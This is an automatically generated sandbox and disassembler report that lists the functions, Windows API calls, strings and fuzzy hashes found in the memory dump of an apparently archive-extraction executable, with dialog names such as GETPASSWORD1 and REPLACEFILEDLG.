GETPASSWORD1, xrefs: 003DC017
*a@, xrefs: 003DC065
*a@, xrefs: 003DBFC8

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: DialogParam
String ID: *a@$*a@$GETPASSWORD1
API String ID: 665744214-2360177026
Opcode ID: 86a3163596dc8c9db090c576f91fa631321eb6948d418a5627b5826f8b97860d
Instruction ID: 4a20ecf44f437aa9b3276eac9a74e7361e5558f71bf3c5ff5644d455ecd9448a
Opcode Fuzzy Hash: 86a3163596dc8c9db090c576f91fa631321eb6948d418a5627b5826f8b97860d
Instruction Fuzzy Hash: 28113B33264209ABDB23DE24BD05BFA3798BB09751F05407AFE49AB2C1D7B49C50D794

Function 003D9646 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

EndDialog.USER32(?,00000001), ref: 003D9694
GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 003D96AC
SetDlgItemTextW.USER32(?,00000066,?), ref: 003D96DA

Strings

GETPASSWORD1, xrefs: 003D965F

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 51c1b40d0bfb33cbe585ae737e889ba5f4f53661f285f9eaf158f55aa6030fda
Instruction ID: 5ec8aa5005262914e2d84405f4ed7ffaed24f3c60fd7bd8550833f4a7b9cc96a
Opcode Fuzzy Hash: 51c1b40d0bfb33cbe585ae737e889ba5f4f53661f285f9eaf158f55aa6030fda
Instruction Fuzzy Hash: 1D11E1739001187ADB239E64AD49FFA776CEB09760F010027FA49E6680C2A5ED54D7A1

Function 003CB100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 003CB127

Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E

_wcschr.LIBVCRUNTIME ref: 003CB145
_wcschr.LIBVCRUNTIME ref: 003CB155

Strings

%c:\, xrefs: 003CB11D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: adfbfa35dbac95e56c81d9f3caad7442bd7d4b6068daea23f6ed56303f9736aa
Instruction ID: f758a6187bf735e53b17952befc9f5da3d28fe53a17d9df70052add5bb643336
Opcode Fuzzy Hash: adfbfa35dbac95e56c81d9f3caad7442bd7d4b6068daea23f6ed56303f9736aa
Instruction Fuzzy Hash: FD01D25750432179CA22AB769C43E6BF7ACEE96360F5A451EF844CA082FB25DC50C3A1

Function 003CF930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(000001A0,00401E74,00000000,?,?,003CFB88,00000020,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?), ref: 003CF969
CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF973
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF983

Strings

Thread pool initialization failed., xrefs: 003CF99B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 47dfb72e65b46682a05dc19b450ba91e44d4c777892c783101fb8c0e832769bb
Instruction ID: 3921f8002e2dd0fe60b34cf976661e50b9c514f19d6d74adb3ba2bbec9532900
Opcode Fuzzy Hash: 47dfb72e65b46682a05dc19b450ba91e44d4c777892c783101fb8c0e832769bb
Instruction Fuzzy Hash: 00115EB1600706AFD3325F699889FA7FBECEB55355F11482EE2DAC6201DB712C40CB50

Function 003DBEE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 003DBF42
REPLACEFILEDLG, xrefs: 003DBF2C, 003DBF5E

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: cafde03d2054a013045e9811d92e2b947b02f9766d9e05d7dae9f01ab01a2976
Instruction ID: fa182c487e1d486db0467368e1a6ebadf65d5f0356738771f45f0ffacf549826
Opcode Fuzzy Hash: cafde03d2054a013045e9811d92e2b947b02f9766d9e05d7dae9f01ab01a2976
Instruction Fuzzy Hash: 76019E77A08205EFC3028B28FE44E26BBADE749394F024437E641A2770D3729C04EF65

Function 003CCE48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 003CCE57
FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 003CCE66

Strings

RTL, xrefs: 003CCE5F, 003CCE64, 003CCE98
LTR, xrefs: 003CCE76, 003CCE81, 003CCE8A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: LTR$RTL
API String ID: 3537982541-719208805
Opcode ID: 0bc84e5add55507c0e8ba6d23f1fd242c957ff5057c7d12a9af67ab9cce86963
Instruction ID: fa63246a47c2d0127f2cef311b37ac4f3eb3c4e55fb98fcff0c5969748a2b223
Opcode Fuzzy Hash: 0bc84e5add55507c0e8ba6d23f1fd242c957ff5057c7d12a9af67ab9cce86963
Instruction Fuzzy Hash: 80F0243161435867E7296679AC0AFB73BACE782B00F0042ADF60AC61C1DFA59D4887B4

Function 003C9F2A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,003C7F55,?,?,?), ref: 003C9FD0
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,003C7F55,?,?), ref: 003CA014
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,003C7F55,?,?,?,?,?,?,?,?), ref: 003CA095
CloseHandle.KERNEL32(?,?,00000000,?,003C7F55,?,?,?,?,?,?,?,?,?,?,?), ref: 003CA09C

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 273b9736ef0b7cdacb5be01b67ed323cfd67c280027c16711afc28bfc83a8ad8
Instruction ID: cae13af77d3910d89a0a27b8c0edd383370b4b505218b42076aa0bc41b8baa91
Opcode Fuzzy Hash: 273b9736ef0b7cdacb5be01b67ed323cfd67c280027c16711afc28bfc83a8ad8
Instruction Fuzzy Hash: 6441DD31248385AAE732DF24DC05FEABBE8AB81744F05091DF5D4D71C1DA649E08CB53

Function 003E93F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,003E2794,00000000,00000000,003E2FC2,?,003E2FC2,?,00000001,003E2794,F5E85006,00000001,003E2FC2,003E2FC2), ref: 003E9440
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003E94C9
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003E94DB
__freea.LIBCMT ref: 003E94E4

Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9bab4e7d90d573ffab7a6f2b3b190ba5e4d806769f86c6c72988a190549d0f3a
Instruction ID: 8d6747f438bf463369d129e8d86ef5aca3edb48c1725a6307c16be1c464bebf6
Opcode Fuzzy Hash: 9bab4e7d90d573ffab7a6f2b3b190ba5e4d806769f86c6c72988a190549d0f3a
Instruction Fuzzy Hash: BD31C072A0026AAFDB26CF66DC45EAE7BA9EB40310F054229FC04DA2D1E735CD51CB90

Function 003D9A76 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 003D9A86
GetObjectW.GDI32(00000000,00000018,?), ref: 003D9AA7
DeleteObject.GDI32(00000000), ref: 003D9ACF
DeleteObject.GDI32(00000000), ref: 003D9AEE

Part of subcall function 003D8BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,003D9AC8,00000066), ref: 003D8BE1
Part of subcall function 003D8BD0: SizeofResource.KERNEL32(00000000,75FD5780,?,?,003D9AC8,00000066), ref: 003D8BF9
Part of subcall function 003D8BD0: LoadResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C0C
Part of subcall function 003D8BD0: LockResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C17

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: 93a5530b8f7c2cf914f614507a5fdfa8ef2095bcbaa7166761b9b2c8b449dac3
Instruction ID: e1126c05e0600e3773eba272b649a08a8065d36a31ac4522cf03943bf8bef2aa
Opcode Fuzzy Hash: 93a5530b8f7c2cf914f614507a5fdfa8ef2095bcbaa7166761b9b2c8b449dac3
Instruction Fuzzy Hash: 1001DF3364061437C6136778BD42FBBB6AEEF85B51F090013BD04AB391EE219C1582A1

Function 003E1009 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 003E1020

Part of subcall function 003E1658: ___AdjustPointer.LIBCMT ref: 003E16A2

_UnwindNestedFrames.LIBCMT ref: 003E1037
___FrameUnwindToState.LIBVCRUNTIME ref: 003E1049
CallCatchBlock.LIBVCRUNTIME ref: 003E106D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction ID: 74215a3f093599bc446b8a888d2490e8c523719ba9bc4900c79e69de03fae084
Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction Fuzzy Hash: 5D012932000198FBCF236F56DC41EDA7BBAFF48754F054215F91869160C372E8A1DBA0

Function 003E0B66 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 003E0B66
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 003E0B6B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 003E0B70

Part of subcall function 003E1C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 003E1C1F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 003E0B85

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction ID: 6c5d4edab18ee9efc53f4cec2fd316ea302b19dcb22cc9cd7f713bdd3e1ce3d4
Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction Fuzzy Hash: 3FC04C741442F2541C2B3AB325021AD03542C627D9BA513C5F8925F5D39AB6848A6176

Function 003D8CF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 003D8BA5: GetDC.USER32(00000000), ref: 003D8BA9
Part of subcall function 003D8BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 003D8BB4
Part of subcall function 003D8BA5: ReleaseDC.USER32(00000000,00000000), ref: 003D8BBF

GetObjectW.GDI32(?,00000018,?), ref: 003D8D24

Part of subcall function 003D8EEA: GetDC.USER32(00000000), ref: 003D8EF3
Part of subcall function 003D8EEA: GetObjectW.GDI32(?,00000018,?), ref: 003D8F22
Part of subcall function 003D8EEA: ReleaseDC.USER32(00000000,?), ref: 003D8FB6

Strings

(, xrefs: 003D8DEF

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: d3728327a11d22e7f5cb9150320dd4e008b32b97dba4c83681b332d7162a498d
Instruction ID: fe79eb8ae59f5ae2d39b08866658b7448013f045e759cca3257fc389c040a6bf
Opcode Fuzzy Hash: d3728327a11d22e7f5cb9150320dd4e008b32b97dba4c83681b332d7162a498d
Instruction Fuzzy Hash: 5561F6B2204205AFD211DF64D884E6BBBEDFF89704F10495EF599CB260DB71E905CB62

Function 003D01DF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 003D03A5

Strings

%s: %s, xrefs: 003D03B4
%ls, xrefs: 003D021E, 003D0234

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: fd8e908ceeae57896b56506ac9825458db779cb1fc999d5036b395df2ccac5bf
Instruction ID: a05455fa310786cb56d73132de264ca9b89a36bfcc0dd4899909726a957d90bd
Opcode Fuzzy Hash: fd8e908ceeae57896b56506ac9825458db779cb1fc999d5036b395df2ccac5bf
Instruction Fuzzy Hash: 8851FB3714D300F6EA2B1AD5BC4EF39766DAB05F00F60CC1BF38668AE6C5D198506B06

Function 003E7BE8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003E7D54

Part of subcall function 003E5D2D: IsProcessorFeaturePresent.KERNEL32(00000017,003E5D1C,0000002C,003F80D0,003E8D71,00000000,00000000,003E63A2,?,?,003E5D29,00000000,00000000,00000000,00000000,00000000), ref: 003E5D2F
Part of subcall function 003E5D2D: GetCurrentProcess.KERNEL32(C0000417,003F80D0,0000002C,003E5A5A,00000016,003E63A2), ref: 003E5D51
Part of subcall function 003E5D2D: TerminateProcess.KERNEL32(00000000), ref: 003E5D58

Strings

., xrefs: 003E7F0B
*?, xrefs: 003E7C2B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
Instruction ID: 4a8b14c566a22a4014a4ada43a662a86b7a13a36bd0ef5038770efcc99a2ba65
Opcode Fuzzy Hash: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
Instruction Fuzzy Hash: A051C371E04269AFCF16DFA9CC81ABEB7B9FF58310F254269E454E7381E6319E018B50

Function 003C7619 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C761E
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003C7799

Part of subcall function 003CA0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA0D7
Part of subcall function 003CA0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA108

Strings

:, xrefs: 003C768F

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
